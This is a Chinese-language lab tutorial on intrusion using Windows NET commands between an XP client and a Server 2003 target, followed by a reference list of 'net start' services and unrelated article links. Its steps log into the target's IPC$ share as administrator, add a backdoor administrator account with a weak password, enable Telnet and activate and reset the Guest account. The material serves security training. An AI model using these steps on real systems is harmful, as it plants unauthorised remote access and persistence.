实验目的

了解NET入侵的过程

掌握NET命令的使用方法和它的参数搭配

实验内容

NET命令的使用方法和它的参数搭配

实验环境描述

XP作为客户端,Windows server 2003作为远程服务器。

实验步骤

在Windows xp和win 2003系统,两人进行实验,相互得知对方的IP及用户名、密码。在此server 2003系统IP为192.168.1.2。此IP地址不固定。

2.点击windows xp的“打开控制台”登录到实验场景中的目标主机。 点击windows 2003的“打开控制台”,账号administrator,密码p@ssw0rd,登录到实验场景中的目标主机。点击windows xp的“打开控制台”账号safe,密码p@ssw0rd,直接进入windowsxp如图所示:

3.登陆windows xp主机:“net use \\192.168.1.2\ipc$ p@ssw0rd  /user:administrator”如下图:

4.创建一个用户,由于SA的权限相当于系统的超级用户,如:加一个sysusers的用户密码为111111 。输入命令:“net  user sysusers 111111 /add”

5.显示命令成功后,就可以把他加入Administrators组了,输入命令:“net localgroup Administrators sysusers /add”,如下图:

6.打开对方的TELNET服务命令为:“net start telnet”如下图:

注:“net start telnet”命令正常情况下可以开启对方的“telnet”服务,但是因为对方该服务禁用了,所以需要先把禁用给去掉,然后再启动。

7.将telnet服务设置为“自动”,命令为“sc config tlntsvr start= auto”,需要注意的是,telnet服务在这里一定要用“tlntsvr”,用“sc config telnet start= auto”是无法启动的,另外“=”号后边和“auto”之前要有一个空格,如下图:

8.启动“telnet”服务,命令为“net start telnet”或者用“net start tlntsvr”进行启动,如下图: 激活Guest用户(guest是windows的默认用户),输入命令:“net user guest /active:yes”

9.把一个用户的密码改掉,把 guest的密码改为111111,其他用户也可以的。只要有权限就可以。执行“net user guest 111111”命令,如下图

10.退出远程连接命令:“net use * /delete”,如下图

11.用net命令的帮助时,所有 net 命令接受选项 / yes 和 /no(可缩写为 / y 和 /n )。/y 对命令产生的任何交互提示自动回答“是”,/n 回答“否”。例如,net stop server 通常提示确认是否根据服务器服务结束所有服务,net stop server /y 自动回答“是”并关闭服务器服务。如下图:

  1. 提供网络命令列表及帮助主题,或提供指定命令或主题的帮助。如想得到net命令的用法可以用“net /?”查询,如果想知道net命令中“use”的用法,可以直接输入“net use ?”或者“net use help”来进行进一步查询,或者用“net help use”来获得更详细的内容。

附:常用的net命令 Net start 启动服务,或显示已启动服务的列表

net start [service] 启动相关的服务

相关服务包括 alerter、client service for netware、clipbook server、content index、comput er browser、dhcp client、directory replicator、eventlog、ftp publishing service、 hypermedia object manager、logical disk manager、lpdsvc、media services managemen t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw ork dde dsdm、nt lm security support provider、ole、plug and play、remote access connection manager、remote access isnsap service、remote access server、remote pr ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server 、simple tcp/ip services、site server ldap service、smartcard resource manager、s nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking service、tracking (server) service、ups、Windows time service 和 workstation。

下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service for netware、microsoft dhcp service、print service for macintosh、windows interne t name service。

Net start Alerter 启动“警报器”服务。“警报器”服务发送警告消息。

Net start ClipBook Server 启动“剪贴簿服务器”服务。

net start "computer browser" 启动“计算机浏览器”服务。 Net start DHCP Client 启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。

Net start Eventlog 启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记 录的事件之前启动该服务。 net start messenger 启动“信使”服务。“信使”服务允许计算机接收邮件。 net start "net logon" 启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。 两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net start netlogon 启动。 net start "network dde"    启动“网络 DDE”服务。

net start "nt lm security support provider" 启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序” 后才可用。

net start ole 启动对象链接和嵌入服务。

net start "remote access connection manager" 启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。

net start "remote procedure call (rpc) locator" 启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。

net start schedule 启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。

net start server 启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。

net start spooler 启动“后台打印程序”。

net start ups 启动“不间断电源 (UPS)”服务

net start workstation 启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。

Net start Schedule 有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!

Net start Telnet 启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找 吧!

net start workstation 打开NET USE

net start lanmanserver 打开 IPC 服务

实验到此结束;

NET命令入侵实例的更多相关文章

  1. linux常用命令与实例小全

    转至:https://www.cnblogs.com/xieguohui/p/8296864.html  linux常用命令与实例小全 阅读目录(Content) 引言 一.安装和登录 (一)    ...

  2. Linux chmod命令修改文件与文件夹权限的命令附实例

    Linux chmod命令修改文件与文件夹权限的命令附实例 作者:佚名 字体:[增加 减小] 来源:互联网 时间:05-01 20:46:07我要评论 在linux中要修改一个文件夹或文件的权限我们需 ...

  3. ssh远程登录命令简单实例

    ssh远程登录命令简单实例 ssh命令用于远程登录上Linux主机. 常用格式:ssh [-l login_name] [-p port] [user@]hostname 更详细的可以用ssh -h查 ...

  4. SPOOL 命令使用实例【oracle导出纯文本格式文件】

    SPOOL 命令使用实例[oracle导出纯文本格式文件] SET echo off              --在用start命令执行一个sql脚本时,是否显示脚本中正在执行的SQL语句: SET ...

  5. 【转载】恢复误删文件--DOS命令应用实例(一)

    <电脑爱好者>报转载第一辑第二篇之恢复误删文件--DOS命令应用实例(一)                             恢复误删文件--DOS命令应用实例(一) 上期我们讲述了 ...

  6. linux常用命令加实例大全

    目  录引言    1一.安装和登录    2(一)    login    2(二)    shutdown    2(三)    halt    3(四)    reboot    3(五)    ...

  7. IIS7 全新管理工具AppCmd.exe的命令使用实例分享

    IIS 7 提供了一个新的命令行工具 Appcmd.exe,可以使用该工具来配置和查询 Web 服务器上的对象,并以文本或 XML 格式返回输出. 下面是一些可以使用 Appcmd.exe 完成的任务 ...

  8. linux scp命令参数及用法详解--linux远程复制拷贝命令使用实例【转】

    转自:http://blog.csdn.net/jiangkai_nju/article/details/7338177 一般情况,本地网络跟远程网络进行数据交抱,或者数据迁移,常用的有三种方法,一是 ...

  9. Linux(CentOS)下SVN命令使用实例[转]

    原文出处: http://blog.csdn.net/limingzhong198/article/details/22394809 前言:关于Linux(Unix)系统下的SVN命令使用的文章,在网 ...

随机推荐

  1. 【pwn】攻防世界 pwn新手区wp

    [pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...

  2. C#图片转成流

    Bitmap b = new Bitmap(Server.MapPath(ppath)); Stream ms = new MemoryStream(); b.Save(ms, System.Draw ...

  3. winform GDI+ 抗锯齿

    graphics.SmoothingMode = System.Drawing.Drawing2D.SmoothingMode.AntiAlias;

  4. pytorch运行错误:ValueError: too many dimensions 'str'

    问题: 本人在使用BERT进行微调的时候,在读取数据的时候出现了一个错误:ValueError: too many dimensions 'str'    于是我Debug了以后,发现问题出现在这个部 ...

  5. Protobuf 动态加载 .pb 文件并操作 Message

    之前写了<Protobuf 动态加载 .proto 文件并操作 Message>.除了直接读取 .proto 文件之外,还有一种类似的方法.先把 .proto 文件编译成 .pb 文件,再 ...

  6. Datawhale 人工智能培养方案

    版本号:V0.9 阅读须知 每个专业方向对应一个课程表格 课程表格里的课程排列顺序即为本培养方案推荐的学习顺序 诚挚欢迎为本培养方案贡献课程,有意向的同学请联系Datawhale开源项目管理委员会 本 ...

  7. Execution default-resources of goal org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources failed.

    说明 今天发现这个错误,然后整体检查了一下代码,没有发现任何错误,最后没法只有来一步一步排查. 解决 确定pom文件是否有问题 如上图,有红色波浪线,代表错误,请检查并解决,还有版本是否冲突,最好把不 ...

  8. application/x-www-form-urlencoded、application/json、multipart/form-data、text/xml简单总结

    最近在数据传输时,一直不明白这四种的区别,查了很多资料,也还是感到很模糊,因此,简单总结一下,以后再完善 1.在GET方式传输数据中,这四种格式,后台都可以接收数据(原生的request.getPar ...

  9. Mac系统如何显示隐藏文件

    Command+Shift+. 可以显示隐藏文件.文件夹,再按一次,恢复隐藏:finder下使用Command+Shift+G 可以前往任何文件夹,包括隐藏文件夹.

  10. 异步回调实现- Guava Retryer

    为什么要使用重试利器Retryer 在实际开发中我们经常会遇到需要轮询查询一个接果,实现轮询的方式有很多种,我们经常要写许多代码,有时还会怕写出的代码有bug,如果已经有轮子了,我们就没必要重复造轮子 ...